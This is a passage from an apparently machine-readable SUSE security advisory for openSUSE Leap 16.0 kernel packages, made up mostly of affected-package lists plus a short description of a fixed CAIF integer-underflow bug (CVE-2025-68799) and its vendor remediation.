"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68799",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68799"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncaif: fix integer underflow in cffrml_receive()\n\nThe cffrml_receive() function extracts a length field from the packet\nheader and, when FCS is disabled, subtracts 2 from this length without\nvalidating that len \u003e= 2.\n\nIf an attacker sends a malicious packet with a length field of 0 or 1\nto an interface with FCS disabled, the subtraction causes an integer\nunderflow.\n\nThis can lead to memory exhaustion and kernel instability, potential\ninformation disclosure if padding contains uninitialized kernel memory.\n\nFix this by validating that len \u003e= 2 before performing the subtraction.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68799",
"url": "https://www.suse.com/security/cve/CVE-2025-68799"
},
{
"category": "external",
"summary": "SUSE Bug 1256643 for CVE-2025-68799",
"url": "https://bugzilla.suse.com/1256643"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
